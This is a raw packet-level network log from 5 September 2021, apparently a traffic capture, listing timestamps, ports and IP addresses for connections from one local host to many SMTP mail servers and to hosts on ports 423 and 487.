Sep 5, 2021 15:50:22.454483986 CEST	49849	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:22.567629099 CEST	25	49849	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:22.567785025 CEST	49849	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:22.580610991 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.580962896 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.650105000 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.663595915 CEST	49843	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:22.706020117 CEST	25	49784	211.231.108.176	192.168.2.4
Sep 5, 2021 15:50:22.706176043 CEST	49784	25	192.168.2.4	211.231.108.176
Sep 5, 2021 15:50:22.709222078 CEST	423	49843	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:22.709364891 CEST	49843	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:22.710407019 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.717854023 CEST	25	49849	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:22.727732897 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.727878094 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.729532003 CEST	49850	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:22.740459919 CEST	49849	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:22.770397902 CEST	423	49850	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:22.770555019 CEST	49850	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:22.788485050 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:22.789474010 CEST	49851	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:22.797528982 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.797589064 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.798084021 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.798218012 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.798917055 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.799235106 CEST	49853	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:22.812446117 CEST	423	49850	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:22.812779903 CEST	49850	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:22.853439093 CEST	25	49849	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:22.853461981 CEST	25	49849	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:22.854496956 CEST	423	49850	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:22.856198072 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.856462955 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.856569052 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.856631994 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.856702089 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.856816053 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.856847048 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.856908083 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.856980085 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.857053041 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.858346939 CEST	423	49851	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:22.858438015 CEST	49851	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:22.863270044 CEST	49849	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:22.871566057 CEST	423	49819	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:22.871673107 CEST	49819	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:22.897876978 CEST	49844	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:22.898530960 CEST	49854	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:22.912111998 CEST	25	49853	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:22.912230968 CEST	49853	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:22.922940969 CEST	423	49844	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:22.923101902 CEST	49844	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:22.923540115 CEST	423	49854	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:22.923644066 CEST	49854	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:22.925734043 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.925945997 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.926057100 CEST	423	49851	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:22.926105022 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.926393032 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.926393986 CEST	49851	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:22.926630974 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.926827908 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.927068949 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.928664923 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.928687096 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.949132919 CEST	423	49854	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:22.949465036 CEST	49854	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:22.972304106 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.972666979 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:22.972771883 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.973180056 CEST	49848	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:22.974560976 CEST	423	49854	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:22.977157116 CEST	25	49849	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:22.977289915 CEST	25	49849	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:22.977380037 CEST	49849	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:22.994196892 CEST	423	49851	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:23.042109013 CEST	487	49848	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:23.076267004 CEST	25	49853	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:23.162178993 CEST	49853	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:23.163750887 CEST	49849	25	192.168.2.4	67.195.204.80
Sep 5, 2021 15:50:23.245435953 CEST	49855	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:23.272881031 CEST	49845	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:23.272918940 CEST	49847	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:23.273613930 CEST	49856	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:23.274286032 CEST	49857	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:23.275065899 CEST	25	49853	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:23.275085926 CEST	25	49853	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:23.276510954 CEST	25	49849	67.195.204.80	192.168.2.4
Sep 5, 2021 15:50:23.283668995 CEST	49853	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:23.305335999 CEST	423	49847	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:23.305437088 CEST	49847	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:23.305556059 CEST	423	49857	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:23.305632114 CEST	49857	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:23.337205887 CEST	423	49857	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:23.337441921 CEST	49857	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:23.342858076 CEST	423	49856	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:23.342947006 CEST	49856	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:23.343278885 CEST	423	49845	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:23.343352079 CEST	49845	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:23.368741035 CEST	423	49857	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:23.382288933 CEST	49846	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:23.382951975 CEST	49858	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:23.391180038 CEST	25	49855	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:23.391309023 CEST	49855	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:23.396922112 CEST	25	49853	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:23.397133112 CEST	25	49853	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:23.397183895 CEST	49853	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:23.412493944 CEST	423	49856	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:23.412744045 CEST	49856	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:23.413779020 CEST	49853	25	192.168.2.4	67.195.204.79
Sep 5, 2021 15:50:23.437510014 CEST	49859	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:23.450422049 CEST	423	49846	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:23.450551033 CEST	49846	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:23.451642990 CEST	423	49858	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:23.451729059 CEST	49858	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:23.482198954 CEST	423	49856	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:23.507309914 CEST	49850	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:23.507997036 CEST	49860	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:23.520000935 CEST	423	49858	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:23.520271063 CEST	49858	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:23.527012110 CEST	25	49853	67.195.204.79	192.168.2.4
Sep 5, 2021 15:50:23.539390087 CEST	25	49859	104.47.53.36	192.168.2.4
Sep 5, 2021 15:50:23.539488077 CEST	49859	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:23.540184021 CEST	49861	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:23.540211916 CEST	49859	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:23.550570965 CEST	423	49850	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:23.550595045 CEST	423	49860	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:23.550642014 CEST	49850	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:23.550739050 CEST	49860	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:23.552243948 CEST	49851	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:23.552262068 CEST	49854	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:23.552879095 CEST	49862	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:23.553419113 CEST	49863	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:23.578373909 CEST	423	49854	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:23.578444004 CEST	49854	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:23.578557014 CEST	423	49863	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:23.578640938 CEST	49863	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:23.587785959 CEST	423	49858	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:23.591955900 CEST	423	49860	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:23.592227936 CEST	49860	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:23.604073048 CEST	423	49863	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:23.604302883 CEST	49863	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:23.622594118 CEST	423	49851	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:23.622658014 CEST	49851	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:23.626154900 CEST	423	49862	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:23.626279116 CEST	49862	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:23.629863977 CEST	423	49863	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:23.634995937 CEST	423	49860	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:23.642591000 CEST	25	49859	104.47.53.36	192.168.2.4
Sep 5, 2021 15:50:23.645256042 CEST	25	49859	104.47.53.36	192.168.2.4
Sep 5, 2021 15:50:23.645385027 CEST	49859	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:23.645728111 CEST	25	49859	104.47.53.36	192.168.2.4
Sep 5, 2021 15:50:23.645807981 CEST	49859	25	192.168.2.4	104.47.53.36
Sep 5, 2021 15:50:23.664083958 CEST	25	49861	144.160.235.144	192.168.2.4
Sep 5, 2021 15:50:23.664194107 CEST	49861	25	192.168.2.4	144.160.235.144
Sep 5, 2021 15:50:23.697678089 CEST	423	49862	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:23.697958946 CEST	49862	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:23.724668026 CEST	25	49855	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:23.724689960 CEST	25	49855	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:23.724873066 CEST	49855	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:23.741563082 CEST	49855	25	192.168.2.4	96.114.157.80
Sep 5, 2021 15:50:23.757306099 CEST	49857	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:23.757884979 CEST	49864	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:23.770385981 CEST	423	49862	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:23.788743019 CEST	423	49857	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:23.788846970 CEST	49857	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:23.789545059 CEST	423	49864	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:23.789659977 CEST	49864	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:23.804137945 CEST	49856	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:23.804862022 CEST	49865	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:23.823108912 CEST	423	49864	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:23.823363066 CEST	49864	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:23.855220079 CEST	423	49864	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:23.873944998 CEST	423	49865	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:23.874099016 CEST	49865	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:23.876828909 CEST	423	49856	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:23.876914024 CEST	49856	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:23.882294893 CEST	49858	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:23.883073092 CEST	49866	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:23.888863087 CEST	25	49855	96.114.157.80	192.168.2.4
Sep 5, 2021 15:50:23.929203033 CEST	49860	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:23.929230928 CEST	49863	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:23.929900885 CEST	49867	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:23.930449009 CEST	49868	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:23.942426920 CEST	423	49865	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:23.942635059 CEST	49865	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:23.950282097 CEST	423	49858	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:23.950402021 CEST	49858	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:23.951150894 CEST	423	49866	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:23.951231003 CEST	49866	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:23.955224037 CEST	423	49863	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:23.955339909 CEST	49863	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:23.956099033 CEST	423	49868	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:23.956218004 CEST	49868	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:23.970915079 CEST	423	49860	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:23.971014023 CEST	49860	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:23.971607924 CEST	423	49867	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:23.971688986 CEST	49867	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:23.981549978 CEST	423	49868	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:23.981832981 CEST	49868	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:24.006874084 CEST	423	49868	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:24.009944916 CEST	423	49865	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:24.017390013 CEST	423	49867	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:24.022526026 CEST	423	49866	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:24.028093100 CEST	49866	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:24.028481960 CEST	49867	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:24.029052019 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.038532972 CEST	49862	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:24.039190054 CEST	49870	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:24.058690071 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.070436954 CEST	423	49867	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:24.072477102 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:24.074306965 CEST	49871	25	192.168.2.4	66.111.4.73
Sep 5, 2021 15:50:24.095318079 CEST	423	49866	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:24.099819899 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.104419947 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.104510069 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.108897924 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:24.110295057 CEST	423	49862	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:24.110407114 CEST	49862	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:24.117568970 CEST	423	49870	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:24.117651939 CEST	49870	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:24.144721985 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.159822941 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:24.175442934 CEST	25	49871	66.111.4.73	192.168.2.4
Sep 5, 2021 15:50:24.175601006 CEST	49871	25	192.168.2.4	66.111.4.73
Sep 5, 2021 15:50:24.196091890 CEST	423	49870	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:24.196417093 CEST	49870	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:24.238312006 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.238585949 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.251137018 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.274605036 CEST	423	49870	193.56.146.43	192.168.2.4
Sep 5, 2021 15:50:24.279299974 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:24.288610935 CEST	49864	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:24.289259911 CEST	49872	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:24.307396889 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.312387943 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.320605040 CEST	423	49864	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:24.320641041 CEST	423	49872	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:24.320728064 CEST	49864	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:24.320769072 CEST	49872	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:24.336608887 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:24.352972031 CEST	423	49872	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:24.353276014 CEST	49872	423	192.168.2.4	5.61.37.41
Sep 5, 2021 15:50:24.353679895 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.357333899 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.357420921 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.362338066 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.362360001 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.362370014 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.362452030 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.362466097 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.362478971 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:24.384686947 CEST	423	49872	5.61.37.41	192.168.2.4
Sep 5, 2021 15:50:24.387979031 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.429338932 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.429362059 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.429553986 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.429794073 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.430032015 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.445322990 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.456399918 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:24.478055954 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.478353024 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.478470087 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.478529930 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.478610992 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.478718042 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.478806973 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.478876114 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.478938103 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.479002953 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.479060888 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.484179974 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.484335899 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:24.484520912 CEST	49795	25	192.168.2.4	178.32.124.207
Sep 5, 2021 15:50:24.510039091 CEST	25	49795	178.32.124.207	192.168.2.4
Sep 5, 2021 15:50:24.550302982 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.550481081 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.551038027 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.551240921 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.551680088 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.551841974 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.551954031 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.552237988 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.552598953 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.552669048 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.554220915 CEST	49865	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:24.554256916 CEST	49868	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:24.554939032 CEST	49873	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:24.555531025 CEST	49874	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:24.581094027 CEST	423	49868	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:24.581176996 CEST	49868	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:24.583856106 CEST	423	49874	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:24.583961964 CEST	49874	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:24.609077930 CEST	423	49874	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:24.609179020 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.609360933 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.609428883 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.609510899 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.609555960 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.612196922 CEST	49874	423	192.168.2.4	213.227.140.23
Sep 5, 2021 15:50:24.622921944 CEST	423	49865	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:24.622977972 CEST	49865	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:24.624845982 CEST	423	49873	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:24.624918938 CEST	49873	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:24.632083893 CEST	49869	487	192.168.2.4	193.56.146.188
Sep 5, 2021 15:50:24.637025118 CEST	423	49874	213.227.140.23	192.168.2.4
Sep 5, 2021 15:50:24.695092916 CEST	423	49873	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:24.703820944 CEST	487	49869	193.56.146.188	192.168.2.4
Sep 5, 2021 15:50:24.788558960 CEST	49873	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:24.823041916 CEST	49873	423	192.168.2.4	193.56.146.42
Sep 5, 2021 15:50:24.823132038 CEST	49866	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:24.823149920 CEST	49867	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:24.823664904 CEST	49875	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:24.824203968 CEST	49876	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:24.866890907 CEST	423	49867	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:24.866980076 CEST	49867	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:24.867806911 CEST	423	49876	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:24.867894888 CEST	49876	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:24.892626047 CEST	423	49866	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:24.892752886 CEST	49866	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:24.894697905 CEST	423	49873	193.56.146.42	192.168.2.4
Sep 5, 2021 15:50:24.897278070 CEST	423	49875	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:24.897351980 CEST	49875	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:24.910481930 CEST	423	49876	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:24.910777092 CEST	49876	423	192.168.2.4	95.216.195.92
Sep 5, 2021 15:50:24.952485085 CEST	423	49876	95.216.195.92	192.168.2.4
Sep 5, 2021 15:50:24.969432116 CEST	423	49875	193.56.146.41	192.168.2.4
Sep 5, 2021 15:50:24.969631910 CEST	49875	423	192.168.2.4	193.56.146.41
Sep 5, 2021 15:50:25.007349014 CEST	49870	423	192.168.2.4	193.56.146.43
Sep 5, 2021 15:50:25.007850885 CEST	49877	423	192.168.2.4	193.56.146.43
